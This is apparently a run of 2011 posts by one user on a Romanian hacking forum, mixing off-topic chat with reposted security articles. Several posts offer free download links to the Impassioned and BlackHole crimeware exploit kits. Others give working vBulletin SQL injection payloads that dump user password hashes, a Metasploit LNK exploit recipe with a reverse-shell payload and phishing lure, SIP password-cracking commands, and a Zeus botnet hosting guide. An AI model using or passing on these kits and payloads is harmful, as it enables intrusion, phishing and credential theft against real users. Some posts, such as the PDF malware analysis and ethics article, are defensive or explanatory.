Nytro

Lasand asta... Da, ce-i drept se posteaza mult mai mult aici. Motivul e simplu: e mult mai usor sa discuti despre Coca-Cola vs Pepsi decat despre compilarea kernelului de exemplu. Si lumea nu se chinuie sa invete cate ceva... Vreau sa fac ceva legat de membrii stupizi si inutili ai forumului care posteaza doar aici, CERERI si Ajutor, insa nu am timp momentan. Oricum, categoria asta nu strica. Se invata multe de aici, doar ca multe lucruri care nu au legatura cu IT-ul.

Impassioned Framework Download - Another Crimeware Available for Free ! : The Hacker News Russo is the creator of Impassioned Framework - Browser Exploitation Kit, a subscription-based software vulnerability exploit service. He is 23 year old the young hacker, This toolkits designed to be stitched into a Web site and probe visitor PCs for security holes that can be used to surreptitiously install malicious software. Impassioned Framework Recent Attack : Security weaknesses in the hugely popular file-sharing Web site thepiratebay.org have exposed the user names, e-mail and Internet addresses of more than 4 million Pirate Bay users using this Kit. Browsers Affected : - Chrome - Firefox - Msie 6 - Msie 7 - Msie 8 - Opera - Safari Os Affected : - Windows x - Unix and OS X NON AFFECTED Best exploits currently available: - MS09_002 - MS09_043 - MS Dshow - iepeers.dll - Firefox escape - Firefox CompareTo - Java Calendar - Adobe Reader Lib - Adobe Reader newPlayer - Adobe Flash 9 - Adobe Flash 10 Black Market Prices: $1,399 EURO / 1 MONTHS LICENSE. $2,999 EURO / 6 MONTHS LICENSE. $3,999 EURO / 12 MONTHS LICENSE. But Now Impassioned Framework is Available for Free Here !! Download ,1.14 MB - Multiupload.com - upload your files to multiple file hosting sites! Purpose Of Public Release: All Most wanted Crimeware kits are now available for free everywhere, this gives more chance to every Security pro to do more Research on them and also Antivirus Companies should now cover all these security holes/Exploits as soon as possible in their Next Update. Download: http://www.multiupload.com/9ELC2CART6 Sursa: Impassioned Framework Download - Another Crimeware Available for Free ! ~ THN : The Hackers News

Defineste termenul hacker. Eu spun asta: "ripoff, cel care a postat mai sus, e hacker". Astept sa imi demonstrezi ca nu este hacker, din moment ce ai specificat ca nu e niciun hacker printre membri.

Hacking Exposed VoIP/SIP - SIPVicious What is SIPVicious tool suite? SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools: * svmap - this is a sip scanner. Lists SIP devices found on an IP range * svwar - identifies active extensions on a PBX * svcrack - an online password cracker for SIP PBX * svreport - manages sessions and exports reports to various formats * svcrash - attempts to stop unauthorized svwar and svcrack scans Requirements Python SIPVicious works on any system that supports python 2.4 or greater. Operating System It was tested on the following systems: * Linux * Mac OS X * Windows * FreeBSD 6.2 * Jailbroken iPhone with python installed If you use it on systems that are not mentioned here please let me know goes it goes. Hacking Exposed VoIP/SIP VoIP systems becoming increasingly popular, attracted people are not only legitimate users that are looking to use it in their business but those who would like to make free calls at other people’s expense. SIP devices are often attacked, with the intent of finding the username/password of accounts on that device. VoIP attacks are found over misconfiguration or problems while implementing the PBX system. For testing these vulnerabilities we can use SIPVicious which is a set of tools that can be used to audit SIP based VoIP systems. It consists of five tools: * svmap – this is a sip scanner. Lists SIP devices found on an IP range * svwar – identifies active extensions on a PBX * svcrack – an online password cracker for SIP PBX * svreport – manages sessions and exports reports to various formats * svcrash – attempts to stop unauthorized svwar and svcrack scans This set of tools is written in Python and can be used on different operating systems. To better understand the way it works we can use the following scenarios: – Running svmap to look for SIP phones: box $ ./svmap.py 192.168.1.1/24 | SIP Device | User Agent | —————————————————— | 192.168.1.111:5868 | Asterisk PBX | | 192.168.1.112:5060 | unknown | box $ Here we can find an Asterisk PBX server detected on 192.168.1.111. - Running svwar with default options on the target Asterisk PBX, these accounts can be used for calling: box $ ./svwar.py 192.168.1.111 | Extension | Authentication | —————————— | 202 | reqauth | | 203 | reqauth | | 200 | reqauth | | 201 | noauth | box $ There are 4 extensions located, from 200 through 203 and 201 does not require authorization while the rest requires authorization. - Using svcrack with the optimization enabled can help in discovering number based password as it just tries three-digit number combinations in order until it finds the password. box $ ./svcrack.py 192.168.1.111 –u 201 | Extension | Password | ———————— | 201 | 201 | box $ Password for extension 201 is 201, as shown above. To see how the attack works we can use –vv as follows: ]svcrack.py 192.168.1.111 –u 201 –vv ].and the screen will display what combination it is trying. - The cracker can also use a dictionary file full of possible passwords. box $ ./svcrack.py 192.168.1.111 –u 203 \ -d dictionary.txt | Extension | Password | ———————— | 203 | ascript | box $ If you want to secure your VoIP/SIP, you need to start by setting the Firewall level to allow access for only a specific IP group and add the list of static IP addresses that are going to use the VoIP. If you are working remotely it will be also important to enable VPN for authenticating and encrypting your connection. Sursa: Hacking Exposed VoIP/SIP | SecTechno SIPVicious: http://code.google.com/p/sipvicious/

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability ==================================================================== #vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability# ==================================================================== # # # 888 d8 888 _ 888 ,d d8 # # e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ # # d888 888 d888 888 888d8b 888 888b 888 888 # # 8888 888 / 888 888 888Y88b 888 8888 888 888 # # Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 # # "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ # # # ==================================================================== #PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst# ==================================================================== #[+] Discovered By : D4rkB1t #[+] Site : NaN #[+] support e-mail : d4rkb1t@live.com Product: http://www.vbulletin.com Version: 4.0.x Dork : inurl:"search.php?search_type=1" -------------------------- # ~Vulnerable Codes~ # -------------------------- /vb/search/searchtools.php - line 715; /packages/vbforum/search/type/socialgroup.php - line 201:203; -------------------------- # ~Exploit~ # -------------------------- POST data on "Search Multiple Content Types" => "groups" &cat[0]=1) UNION SELECT database()# &cat[0]=1) UNION SELECT table_name FROM information_schema.tables# &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# More info: http://j0hnx3r.org/?p=818 -------------------------- # ~Advice~ # -------------------------- Vendor already released a patch on vb#4.1.3. UPDATE NOW! ==================================================================== # 1337day.com [2011-5-21] ==================================================================== Sursa: vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability Info: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r E public (thanks "d") de ceva timp, dar vad ca acum apare si pe exploit-db. Video Demonstration by TinK:

Eu sunt de parere ca e invers, si ca anume socializarea reala duce la socializare online. Adica, eu adaug ca "prieten" pe cineva pe Facebook, sau ma adauga cineva dupa ce ne cunoastem in viata de zi cu zi. Am doar cativa "prieteni" online pe care nu ii cunosc in viata de zi cu zi. Si nu cred ca dauneaza statul mult pe retelele de socializare. Poti afla extrem de multe lucruri despre prieteni de acolo...

Stanford computer scientists find Internet security flaw BY MELISSAE FELLET Researchers at the Stanford Security Laboratory create a computer program to defeat audio captchas on website account registration forms, revealing a design flaw that leaves them vulnerable to automated attacks. Stanford researchers have found an audible security weakness on the Internet. If you've ever registered for online access to a website, it's likely you were required as part of the process to correctly read a group of distorted letters and numbers on the screen. That's a simple test to prove you're a human, not a computer program with malicious intent. Though computers are good at filling out forms, they struggle to decipher these wavy images crisscrossed with lines, known as captchas (short for Completely Automated Public Turing test to tell Computers and Humans Apart). But there's a second type of captcha, and it may pose more of a security weakness. These audio captchas, designed to help the visually impaired, require users to accurately listen to a string of spoken letters and/or numbers disguised with background noise. John Mitchell, a professor of computer science, postdoctoral researcher Elie Bursztein and colleagues built a computer program that could listen to and correctly decipher commercial audio captchas used by Digg, eBay, Microsoft, Yahoo and reCAPTCHA, a company that creates captchas. The researchers presented their results during a symposium on security and privacy in Oakland, Calif. The Stanford program, called Decaptcha, successfully decoded Microsoft's audio captcha about 50 percent of the time. It correctly broke only about 1 percent of reCAPTCHA's codes, the most difficult ones of those tested, but even this small success rate is considered trouble for websites such as YouTube and Facebook that get hundreds of millions of visitors each day. Imagine a large network of malicious computers creating many fake accounts on YouTube. This robot network of accounts could highly rate the same video, falsely increasing its popularity and thereby its advertising revenue. "Bot" networks could also swamp email accounts with spam messages. Decoding sounds Computers have a tough time attempting to read image captchas, but Mitchell and Bursztein wondered if audio captchas were safe from automated attacks, too. The researchers taught their program to recognize the unique sound patterns for every letter of the alphabet, as well as numeral digits. Then they challenged their software to decode audio captchas it had never heard before. The program worked by identifying the sound shapes in the target captcha file, comparing them to those stored in its memory. It worked – the software could to some extent imitate human hearing. "In the battle of humans versus computers, we lost round one for audio captchas," Bursztein said. "But we have a good idea of what round two should be." Designing captchas is challenging. The tests must be simple enough for users to answer quickly, yet complicated enough so computers struggle to decipher the patterns. Background noise in an audio captcha can confuse computers, but little is known about the types of noises that trip them up the most. The researchers generated 4 million audio captchas mixed with white noise, echoes or music, and challenged the program to decode them. After training Decaptcha with some samples, they took it for a test drive. The program easily defeated captchas mixed with static or repetition, with a 60 to 80 percent success rate, but background music made the task more difficult. Decaptcha removes the background noise from each audio file, leaving distinctively shaped spikes of energy for each digit or letter in the captcha. The program clearly isolates these spikes from white noise or echoes. But when the captcha contains noises that mimic these energy spikes, Decaptcha is often confused. Building a program to solve captchas is "an interesting test case for machine learning technology," said Mitchell. "For audio, it's in a realm where machines should do better than humans." Add meaning And they do, until they have to think like us. Music lyrics or garbled voices are forms of semantic noise – sounds that carry meaning. Humans can recognize a message mixed with semantic noise, but computers can't distinguish the two clearly. Decaptcha correctly solved only about 1 percent of these captchas. Of the commercial captchas the team tested, reCAPTCHA was the strongest because it contains background conversation and other semantic noise. Microsoft and Digg have recently changed their audio captchas to use this technology, Bursztein said. But the creation of this latest captcha cracker shows that even the best approach isn't secure enough. "The replacement technology isn't there yet, but we've pinpointed the problem," he said. Citing data obtained from eBay, the researchers say about 1 percent of people who register at the site use audio captchas. That's enough users to warrant an effort to strengthen this security device. The researchers suggest programmers tap into our human ability to understand meaning in sounds to improve future captchas. More secure puzzles could include background music or entire words instead of a string of letters. But the team cautions that programmers need to keep the human user in mind. If the captcha is too complicated, legitimate users won't be able to decode it. Despite efforts to strengthen audio captchas against computer attacks, they will, like visual captchas, still be vulnerable to crowdsourced attacks by a group of people manually solving captchas for low wages. Captchas are vital to freedom on the Internet, the researchers say, as the value of many social media sites depends on the assumption that fellow users are humans. "Captchas are a big inconvenience to people," Mitchell said. "The fact that they're so widely used is evidence of their necessity." Stanford researcher Hristo Paskov also contributed to the study. The Stanford team collaborated with Romain Beauxis from Tulane University and Daniele Perito and Celine Fabry from INRIA, a computer science research institute in France. The research was funded by the National Science Foundation, the Air Force Office of Scientific Research and the Office of Naval Research. Melissae Fellet is a science-writing intern at the Stanford News Service. Sursa: Stanford computer scientists find Internet security flaw

Eu am vrut sa ma implic, dar nu e deloc usor, nu se fac lucruri banale pe acolo. Cauta cartea Windows NT Internals (co-autor - Alex Ionescu, un roman) daca iti plac astfel de lucruri.

Kernel compiling the Debian way On this episode you are going to watch how to compile a kernel, the Debian's way. Further info at lgallardo.com/?en/?2010/?01/?25/?compilar-el-kernel-a-lo-debian/? Video: Kernel compiling the Debian way on Vimeo Cum sa compilezi kernelul rapid si usor, rezultand un .deb... E posibil sa mearga doar pe Debian. Nu am incercat.

Where Are the Ethics in Hacking? May 23, 2011 - Upasana Gupta A recent news story begs the question: What is "ethical" hacking? You may have heard about Australian security researcher Christian Heinrich, who hacked live into Facebook's privacy controls at an IT security conference and accessed private photographs of rival security professional Chris Gatford and his family, including the image of a child. The incident led to a journalist being arrested and having his iPad seized after he published some of the images online. A lot of people don't understand the difference between hacking and ethical hacking. Following the event, detective superintendent Brian Hay, head of the Fraud and Corporate Crime Group of the Queensland Police Service, criticized the demonstration of a so-called ethical hacking. "I think cultures have built up where hacking, in the past, has been a part of a competition, and you have black-hat conferences around the world. The technical reality is that on those occasions crimes may well have been committed." This latest incident has left many questioning what role ethics play in ethical hacking, and what this activity really is about. "The reason ethical hacking exists is because somebody less ethical in a different country will hack your systems and not tell you - that is going to happen no matter what," says Jeremiah Grossman, Founder and CTO of WhiteHat Security. "So, ethical hacking is conducted to hack yourself first and fix the issues and vulnerabilities that remain to avoid being a headline like Sony." Ethical hackers, then, attempt to exploit the IT security of a system on behalf of its owners by following certain polite rules, like getting a written or verbal consent from the owner of the system before the professional conducts the test. "What the Australian researcher did is not ethical hacking," says Jay Bavisi, President of EC-Council, a global certification and training organization for ethical hackers. "A lot of people don't understand the difference between hacking and ethical hacking." Terms like penetration testing, ethical hacking and hacking are interchangeably used, and Bavisi defines each: Hacker: simply a person who invades or interferes with another system with the intent to cause harm, without having any permission from the system owner. Ethical hacker: a professional hired by an organization to review its security posture from the eyes of the hacker. Ethical hackers test vulnerabilities of the systems. Penetration tester: a professional who goes a step beyond the ethical hacker and provides an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, either known and unknown hardware or software flaws, or operational weaknesses. These professionals are largely involved in remediation. The whole process involves a written consent and rules of engagement from the client, which clearly spell what they can or cannot do, "This is basically our 'get out of jail free' card," Bavisi says. Still, Ian Glover, president of the UK's Council of Registered Ethical Security Testers (CREST) , a global organization that assesses the skill and competence of professionals working in the penetration testing industry, says, "I don't like the term ethical hacking." According to him, the term is misleading as hacking immediately presents a negative view of people mounting unsolicited illegal attacks. The professional penetration industry provides an invaluable service to government and business validating security controls. While individuals who believe they can work illegally still exist, the professional penetration testing industry acts in a responsible manner within a strict legal and ethical framework. "In the past there was the opportunity to be a hacker, to do inappropriate things and then people would employ you. In the future that is not going to be the case, as neither the industry nor the buying community will accept individuals who have operated illegally," Glover says. The industry has matured, he says, and because of that the bar of entry is much higher for prospective testers. In this case, he adds that if Heinrich were to be a member of a professional organization like CREST, he would be immediately removed for his actions. There are ethics and morals involved when ethical hackers take up such contracts or positions. They clearly understand their limits dictated by the letter of authorization where the client specifies the scope of engagement. For instance, the servers that can or cannot be tested, the IP range ethical hackers can use etc. These professionals are aware of the legal framework and understand the requirement for full disclosure to the client. "Without permission, no ethical hacker will touch the job and go beyond the scope in any form. This is standard security practice," Bavisi says. The latest incident is just an example of a bad hacker, adds Grossman. "The researcher made a rather common mistake of demonstrating a live vulnerability on stage without permission. Would I have done it? No!" One of the key lessons in this case is the need for better education within the industry to highlight the differences among hackers, ethical hackers and penetration testers. "People must understand the difference between a cop and a thief," Bavisi says. Sursa: Where Are the Ethics in Hacking?

Nu au ce sa faca. Nu au copiat nimic de la Microsot. Am inteles ca cei de la Microsoft au cerut o analiza a codului sursa, dupa ce acum multi ani aparuse pe net codul sursa de la un Windows NT parca, si nu era nimic copiat. Munca lor e proprie sau "imprumutata" de la Wine (stiti si voi ce este). Ei doar se uita pe MSDN, vad ce functii au cei de la Microsoft, si le scriu ei de la 0. Am vrut si eu sa scriu 2-3 functii care am vazut ca nu sunt implementate, dar ar fi de preferat sa o faca cineva care se pricepe mai bine. PS: Puteti intalni des mesajul: functia nu a fost implementata. Si puteti invata foarte multe din codul sursa, eu ma uitam peste Loader-ul lor...

Intercepting GSM Traffic This is the first talk about GSM security held at DeepSec in 2007. Steve talks about intercepting GSM traffic and attacking the A5 encryption algorithm. There were more talks at DeepSec 2009 and 2010. Video: http://vimeo.com/24117925

Passcode bypass of the HTC Desire Z using an unexpected feature of the bootloader By cedric » Sunday 22 May 2011, 10:48 - General Android devices are becoming increasingly present everywhere. iPhone security has been analyzed by researchers -- however this is more difficult for Android devices due to the diversity of vendors and devices: each model has its own characteristics and has a unique combination of hardware and software. What will be discussed here is an unexpected feature of the stock HTC Desire Z bootloader that allows an attacker to access any file on the device before the Linux operating system starts, bypassing the passcode protection entirely. There is a great variety of Android devices from various manufacturers (HTC, Samsung, Motorola, etc.) and customised by numerous telecommunication operators (Orange, T-Mobile, etc.). Before loading the operating system (i.e. Android), these devices generally pre-load a bootloader. This bootloader is not open-source, contrary to the Android source code, and differs from one device to another. Some manufacturers implement a way for the end-user to interact with it using serial over USB. An example below of the available commands of an HTC Desire Z: hboot>h command list keytest heap boot reset powerdown rebootRUU heap_test rtask task enableqxdm gencheckpt list_partition_emmc load_emmc check_emmc check_emmc_mid read_emmc get_wp_info_emmc send_wp_info_emmc get_ext_csd_emmc get_sector_info_emmc One command that got my attention is the read_emmc command. hboot>read_emmc command format: read_emmc [start] [#blocks] [#blocks/read] [show] You can specify the starting offset with the number of blocks to read and it will basically display to you in hexadecimal format the bytes that are on your phone's flash. Below is the first sector that is actually a partition table. hboot>read_emmc 0 1 1 1 reading sector 0 ~ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ... 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 0 0 0 4D 0 0 0 1 0 0 0 E8 3 0 0 0 0 0 0 45 0 0 0 E9 3 0 0 80 0 0 0 0 0 0 0 46 0 0 0 69 4 0 0 28 23 0 0 0 0 0 0 5 0 0 0 91 27 0 0 6E 58 45 0 55 AA read sector done average = 583 The first idea that came to my mind is to dump the whole flash using this method but it is really slow. It took 6 hours to dump 10 MB so it will take approximatively 33 days to get 1,3 GB... So I decided to use FUSE (Filesystem in Userspace) to mount the user data partition remotely and get only the files I want. You basically have to implement those four functions: getattr, readdir, open and read. The phone's filesystem becomes accessible through one device file, let's name it dev. Reads on this file will be proxied by FUSE over USB to the read_emmc implementation on the device. Writes will not be implemented because we do not need them (and we do not have commands such as write_emmc . Consequently, this dev file will have *read only* attributes. # ls -l mnt total 0 -r--r--r-- 1 root root 1232076288 1970-01-01 01:00 dev We now have a virtual disk image that we are able to mount and get the files we are interested in: # dd if=mnt/dev of=first_sector bs=512 count=1 # mount -o loop,ro -t ext2 mnt/dev mnt2 # cp mnt2/data/com.android.providers.telephony/databases/mmssms.db dump/ # cp mnt2/data/com.android.providers.contacts/databases/contacts2.db dump/ Finally, we are able to get the files storing the passcode information (as a numerical PIN code for example below) if the end-user defined one. # cp mnt2/data/com.android.providers.settings/databases/settings.db dump/ # cp mnt2/system/password.key dump/ The salt is stored in the settings.db SQLite database. The passcode is simply stored in a hash form in password.key: SHA-1(password|salt)|MD5(password|salt) So it is easy to bruteforce from the computer once we get the file. This basically shows how some devices may implement things or leave some doors open in a way that allows an attacker to bypass security protections... Sursa: Passcode bypass of the HTC Desire Z using an unexpected feature of the bootloader - Sogeti ESEC Lab

Inside a Malicious PDF Attack By Tomer Bitton, Security Research, Imperva PDFs are widely used business file format, which makes them a common target for malware attacks. On the surface, PDFs are secure, but because they have so many “features,” hackers have learned how to hide attacks deep under the surface. By using a number of utilities, we are able to reverse engineer the techniques in malicious PDFs, providing insight that we can ultimately use to better protect our systems. PDF as Text By opening the PDF file with a text editor it is possible to see that there are some encrypted objects. The first circle, object 11, is a command to execute Javascript in object 12. The second and third circles, are a command for object 12 to filter the Javascript with AsciiHexDecode. The main reason for this filter is to hide malicious code inside the PDF and avoid anti-virus detection. This is our first red flag. Decoding the Hex This second image shows how the stream is decoded, but additional analysis is required to make sense of it. Again, we will open this code with a text editor to understand its purpose. Hex as Text Opening this code as text, the circle indicates it is Javascript, which is another red flag. We will now work to determine its intent. Malzilla Analysis of Javascript By using a utility called Malzilla, we can analyze the Javascript. We input the Javascript in the top box and decode it with the circled button. A closer look at the second circle indicates that this Javascript contains shellcode, yet another red flag. A Closer Look at the Shellcode This is a closer view of the shellcode. Shellcode is typically used to exploit vulnerabilities while avoiding detection. Shellcode has earned its name for launching a command shell for the attacker to control. Shellcode as Exe Again, we run a utility, this time to convert the shellcode into an Executable file, which we save, so that we can take an even closer look at its function. Exe through IDA Here, we run yet another utility, IDA, which enables us to disassemble and debug the commands of the Executable file. As we have highlighted, this file contains multiple Nop slide functions, which are used in Shellcode attacks since the location of the Shellcode is not precisely known. This raises another red flag. From here, we should see if there are any interesting binary strings. Binary Strings Here we have circled multiple binary strings that should raise concern. One of the circled items, URLDownloadToFileA, is a Windows API function to download a file from a remote server and to save it on the user’s PC. In this infected PDF, the shellcode uses it to point the PC to an infection point, which is the IP address we have circled (by the way, don’t visit that IP address). Once the infected file is downloaded, the shellcode will execute it, infecting the computer.There you have it! Like “Inception,” you have to go deeper to find what is truly at the heart of this infected PDF. Hackers are intelligent about wrapping Executable files in shellcode, encrypting it and hiding it in Javascript within PDF files, but by reverse engineering their techniques, we gain a better understanding of our vulnerabilities and can work to strengthen our security posture. Tomer Bitton is a security researcher at Imperva. Sursa: Inside a Malicious PDF Attack | threatpost

Setup Zeus as a hidden service How to setup Zeus 2.0.89 as a hidden service using the tor2web proxy, runing Tor through a logless VPN in Ubuntu 10.10 in a VM. Video: http://vimeo.com/20854260

A practical attack - LNK exploit Notes 1. sudo ./msfconsole 2. use windows/browser/ms10_046_shortcut_icon_dllloader excellent Microsoft Windows Shell LNK Code Execution 3. set SRVHOST 192.168.175.129 4. set Payload windows/meterpreter/reverse_tcp 5. set LHOST 192.168.175.129 6. exploit 7. go to shorturl.com and create a short url for your machines ip 8. Write an email enticing the recipient to click the link. 9. use metaterpreter. 10. pwnage. Video: http://vimeo.com/16699569

BlackHole Exploit Kit 1.0.2 irst Public Release of BlackHole Exploit Kit. BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit. Black Market Cost : Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author’s servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 week, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But Now its FREE HERE ! Feature : One highly touted feature of BlackHole toolkit is its TDS or Traffic Direction Script. While this is not an entirely new concept in attack toolkits the TDS included her is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that allows redirection of traffic through a set of rules. For example, a user can set up a set of rules that redirect flow to different landing pages on their domain. These rules could be based on operating system, browser, country of origin, exploit, files, etc. One rule might redirect traffic to page A for all users that are running Windows OS from XP to Vista and running IE 8, while another rule can redirect Windows 7 users to page B. Those were just simple example rules. More advanced rules could set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole even goes the extra step and allows you to create traffic flows based on these rules and provides management interface for the flows. A savvy malicious user with a lot of experience could easily utilize this rule engine to increase their infection numbers.From a web application standpoint BlackHole is built just like other kits, consisting of a PHP and MySQL backend. Since the majority of web servers run on the LAMP stack this enabled for very easy application deployment. The user interface for this kit is a cut about the rest, and it definitely looks nicer than almost any other attack kit we’ve analyzed. It resembles some of the best legitimate web apps we see in the world of commercial software. Download Link : http://www.multiupload.com/ZTZPEA9L5Y Sursa: BlackHole Exploit Kit 1.0.2 - Download ! ~ THN : The Hackers News

Arachni v.0.2.3 - Open Source Web Application Security Scanner Framework Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process.Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling through the paths of a web application's cyclomatic complexity.This way attack/input vectors that http://www.blogger.com/img/blank.gifwould otherwise be undetectable by non-humans are seamlessly handled by Arachni. The main focus of this release has been on distributed deployment and bugfixing.Main additions include the update of the HTML report to include false positive reporting functionality and an updated WebUI with support for multiple Dispatchers. Informatii, tot: https://github.com/Zapotek/arachni/ Sursa: Arachni v.0.2.3 - Open Source Web Application Security Scanner Framework ~ THN : The Hackers News

iAWACS 2011 Forensics challenge Sunday, May 22, 2011 Hi to all (French version below) The Forensics challenge for iAWACS 2011 is now open. It is inspired from a real case on which a new information hiding techniques has been created. The aim is to test its strength and its security on a almost real implementation (and not with respect to academic conditions). Tactical scheme: a terrorist attack against the RSSIL 2011 event has been prepared according to some intelligence reports. A terrorist has been caught by the French police forces while he was about to recuperate a cell phone hidden in a geocache. Despite the efforts of the Police forensics and technical teams, the analysis of the cell phone has not been successful yet. However, the analysis proved that the Dcim directory is containing a secret message hidden. The terrorist confessed that he was waiting for a call to him on this cell phone to receive instructions about another geocache. This second one contains a SD card with the application to access the secret message. Unfortunately, this call will never happen (newspapers have leaked on this arrest). So will you be clever and imaginative enough to recover the secret message and prevent the attack against RSSIL 2011? Here are the condition for the challenge: * Opening date: May 22nd, 2011. The file dcim.tgz contains the Camera directory (the phone is a Samsung Galaxy S). * Award ceremony (if any winner) or technical hints at the RSSIL 2011 event to go on with the challenge. * End of the challenge: December 31st, 2011. * The solution must sent to iawacs@esiea.fr. Rules of the challenge: * The prize (5000 euros) will be awarded to anyone able to recover the message and the hiding mechanism only. * The technical mechanism will not be disclosed (unless by a potential winner who is free to publish any information with respect to it) by the organizers of the challenge. Only the secret message will be published once the challenge is closed. * Any partial solution, hint or valuable information will be considered for a honor award. Have a nice challenge and good luck guys! Sursa: Operational cryptology and virology lab: iAWACS 2011 Forensics challenge

Alo, tu ai citit ce am scris? Ma refeream la aia care imi dadeau add si nici nu stiau cine sunt sau ma intrebau cum se face server de metin. Unde cacat am zis eu "jegosi"? Pe messenger am zis "aveam multi boscheti in lista" - deci nu toti. Iar mai sus "tot ratatii care ma bagau in lista ma intrebau cine sunt" - deci doar m-am referit la aia care nu stiau cine sunt. Unde te-ai simtit bagat in aceeasi oala? Si ce e atat de important la mail-ul tau? Nu am postat nicaieri o lista cu toate ID-urile, o are un singur ratat care probabil nu stie ce sa faca cu ea. Ce prejudicii morale si financiare ti-a adus faptul ca O PERSOANA cunoaste mail-ul tau? Ce cacat a facut cu el? Ce e cu fitele astea?

Eu prefer berea, e mai naturala. Nici nu stiu de cand nu am mai baut Cola/Pepsi. Bere nu am mai baut de ieri...

Ca sa intelega toata lumea. Acum ceva timp, eu foloseam acel ID: nytro_rst pentru a mai discuta cu memri si alte lucruri care la inceput erau utile. Dar ma trezeam cu zeci de add-uri, ceea ce nu prea ma interesa, dar tot ratatii care ma bagau in lista ma intrebau cine sunt. De asemenea era aiurea sa mi se tot ceara conturi de metin, sau cum se face un server de metin, programe de spart parole sau keyloggere si alte prostii. Si am ajuns rapid la concluzia ca acel ID, pe care cred ca adunasem 1000 de ID-uri, este inutil. Il mai foloseam sa dau cate un mass cu cate ceva legat de RST, dar la fel, inutil, majoritatea nici nu cred ca stiau de RST, sau cel putin o buna parte. Si am ales o solutie stupida, dat fiind faptul ca nu imi pasa de acel ID: dau mass cu parola, si o si postez aici, pe RST. Si asta am si facut. La 1 minut dupa mass-ul in care spuneam care e parola contunui, deja se logase cineva pe contul meu si la 2 minute cred ca era deja schimbata parola. Insa am postat aici pe RST, la Offtopic, unde intra toata lumea sa vada cum sta treaba, si majoritatea au inteles. Si ratatul ala a dat si la inceput vreo 2-3 astfel de mass-uri, dar cred ca si-au batut multi joc de el, si eu parca l-am intrebat ceva de pe un alt ID si am vazut ca nu prea ul duce capul, apoi nu a mai dat. Insa se pare ca mai incearca si el cate ceva. Desigur, daca va trebuie scannere SMTP, SSH sau Keyloggere, luati, dati-i inainte, dar sa nu va vaitati ca sunt infectate. PS: O sa analizez maine fisierul acela de pe megaupload, pe care il tot imprastie, sa vad despre ce e vorba.

Nu cred ca are rost, oricum s-a mai discutat. Cate topicuri referitoare la Linux ati deschis? In cate deja deschise ati comentat cu ceva util? Daca aveti Linux, nu inseamna ca veti si posta cate ceva pe acolo.

Nu am facut-o publica, o are doar un boschetar care nu stie cum sa infecteze si el lumea sa faca rost de conturi de filelist. Nici macar nu scrie frumos si aranjat ca mine...

NU sunt eu ala. Am dat mass cu parola, apoi am postat-o pe RST. Se pare ca un ratat incearca sa va infecteze. Si se pare ca nu ma stresez.